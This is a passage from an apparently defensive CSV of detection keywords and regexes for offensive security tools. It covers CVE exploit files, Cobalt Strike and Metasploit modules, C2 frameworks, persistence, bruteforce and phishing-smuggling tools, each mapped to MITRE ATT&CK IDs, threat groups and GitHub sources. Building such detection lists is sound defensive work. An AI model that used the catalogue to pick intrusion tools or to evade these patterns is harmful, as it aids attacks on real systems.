T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","10","10","158","30","2023-05-23T20:34:26Z","2022-03-13T17:43:29Z" "*CVE-*.bash*",".{0,1000}CVE\-.{0,1000}\.bash.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.bat*",".{0,1000}CVE\-.{0,1000}\.bat.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.bin*",".{0,1000}CVE\-.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.c*",".{0,1000}CVE\-.{0,1000}\.c.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.com*",".{0,1000}CVE\-.{0,1000}\.com.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.cpp*",".{0,1000}CVE\-.{0,1000}\.cpp.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.exe*",".{0,1000}CVE\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.git*",".{0,1000}CVE\-.{0,1000}\.git.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.msi*",".{0,1000}CVE\-.{0,1000}\.msi.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.pl*",".{0,1000}CVE\-.{0,1000}\.pl.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.ps1*",".{0,1000}CVE\-.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.py*",".{0,1000}CVE\-.{0,1000}\.py.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.reg*",".{0,1000}CVE\-.{0,1000}\.reg.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.run*",".{0,1000}CVE\-.{0,1000}\.run.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.sh*",".{0,1000}CVE\-.{0,1000}\.sh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.vb*",".{0,1000}CVE\-.{0,1000}\.vb.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.vbe*",".{0,1000}CVE\-.{0,1000}\.vbe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.vbs*",".{0,1000}CVE\-.{0,1000}\.vbs.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.vbscript*",".{0,1000}CVE\-.{0,1000}\.vbscript.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.zsh*",".{0,1000}CVE\-.{0,1000}\.zsh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE*/exploit.sh*",".{0,1000}CVE.{0,1000}\/exploit\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*CVE_*_exploited.txt*",".{0,1000}CVE_.{0,1000}_exploited\.txt.{0,1000}","offensive_tool_keyword","POC","A Safer PoC for CVE-2022-22965 (Spring4Shell)","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/colincowie/Safer_PoC_CVE-2022-22965","1","1","N/A","N/A","1","45","7","2022-05-27T12:56:40Z","2022-03-31T16:58:56Z" "*cve_2_MSF_exploit_Mapping*",".{0,1000}cve_2_MSF_exploit_Mapping.{0,1000}","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","494","109","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" "*CVE_20*.dll*",".{0,1000}CVE_20.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*cve_2019_0708_bluekeep_fail*",".{0,1000}cve_2019_0708_bluekeep_fail.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cve_2019_0708_bluekeep_pass*",".{0,1000}cve_2019_0708_bluekeep_pass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cve_2020_0796_smbghost.*",".{0,1000}cve_2020_0796_smbghost\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*CVE-2*-RCE.py*",".{0,1000}CVE\-2.{0,1000}\-RCE\.py.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*cve-20.x64.dll*",".{0,1000}cve\-20\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*cve-20.x86.dll*",".{0,1000}cve\-20\.x86\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*CVE-2020-5902-Scanner/scanner.py*",".{0,1000}CVE\-2020\-5902\-Scanner\/scanner\.py.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/aqhmal/CVE-2020-5902-Scanner","1","0","N/A","N/A","1","55","22","2022-12-08T11:03:15Z","2020-07-05T06:19:09Z" "*CVE-2021-34527.ps1*",".{0,1000}CVE\-2021\-34527\.ps1.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cve-20220-26809_exploit.py*",".{0,1000}cve\-20220\-26809_exploit\.py.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","61","27","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" "*CVE-2022-21882.x64.dll*",".{0,1000}CVE\-2022\-21882\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cve-2022-23131.py *",".{0,1000}cve\-2022\-23131\.py\s.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/L0ading-x/cve-2022-23131","1","0","N/A","N/A","1","25","12","2022-02-22T01:45:34Z","2022-02-22T01:39:52Z" "*cve-2022-26809-scanVuln.py*",".{0,1000}cve\-2022\-26809\-scanVuln\.py.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","61","27","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" "*CVE-2022-30190-follina-Office-MSDT-Fixed*",".{0,1000}CVE\-2022\-30190\-follina\-Office\-MSDT\-Fixed.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","4","392","57","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z" "*CVE-2023-20887.git*",".{0,1000}CVE\-2023\-20887\.git.{0,1000}","offensive_tool_keyword","POC","VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)","T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002","TA0005 - TA0002 - TA0001 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sinsinology/CVE-2023-20887","1","1","N/A","N/A","3","226","44","2023-06-13T14:39:17Z","2023-06-13T13:17:23Z" "*cve-2023-21554.nse*",".{0,1000}cve\-2023\-21554\.nse.{0,1000}","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Network Exploitation Tools","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*CVE-2023-23397.ps1*",".{0,1000}CVE\-2023\-23397\.ps1.{0,1000}","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","1","N/A","N/A","4","338","62","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z" "*CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ*",".{0,1000}CVE\-2023\-46604\-RCE\-Reverse\-Shell\-Apache\-ActiveMQ.{0,1000}","offensive_tool_keyword","POC","Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)","T1190 - T1059 - T1071 - T1105 - T1041","TA0001 - TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ","1","1","N/A","9","1","91","31","2024-01-20T16:59:23Z","2023-11-03T22:06:09Z" "*CVE-2024-1086/exploit*",".{0,1000}CVE\-2024\-1086\/exploit.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*CVE-2024-1086-1.0.0.zip*",".{0,1000}CVE\-2024\-1086\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","1","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*cvescanner.py*",".{0,1000}cvescanner\.py.{0,1000}","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","6","512","113","2024-04-17T22:22:22Z","2021-08-18T08:58:14Z" "*cwB0AGEAcgB0ACAAYwBhAGwAYwA=*",".{0,1000}cwB0AGEAcgB0ACAAYwBhAGwAYwA\=.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z" "*cyberark/ACLight*",".{0,1000}cyberark\/ACLight.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*cyberark/kubesploit*",".{0,1000}cyberark\/kubesploit.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*cyberark/PipeViewer*",".{0,1000}cyberark\/PipeViewer.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*cybersectroll/SharpPersistSD*",".{0,1000}cybersectroll\/SharpPersistSD.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*cyclone.hashesorg.hashkiller.combined*",".{0,1000}cyclone\.hashesorg\.hashkiller\.combined.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*cyllective/nimproxydll*",".{0,1000}cyllective\/nimproxydll.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","1","N/A","9","1","11","0","2024-03-22T10:29:56Z","2024-03-15T15:15:45Z" "*cypheroth -u neo4j -p *",".{0,1000}cypheroth\s\-u\sneo4j\s\-p\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*-d * bruteforce -*",".{0,1000}\-d\s.{0,1000}\sbruteforce\s\-.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*-d kali-linux *",".{0,1000}\-d\skali\-linux\s.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage with wsl - example: \system32\wsl.exe -d kali-linux /usr/sbin/adduser???","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*D Y N A S T Y - P E R S I S T*",".{0,1000}D\sY\sN\sA\sS\sT\sY\s\s\-\sP\sE\sR\sS\sI\sS\sT.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*D00MFist/Mystikal*",".{0,1000}D00MFist\/Mystikal.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","268","38","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z" "*D00Movenok/HTMLSmuggler*",".{0,1000}D00Movenok\/HTMLSmuggler.{0,1000}","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense 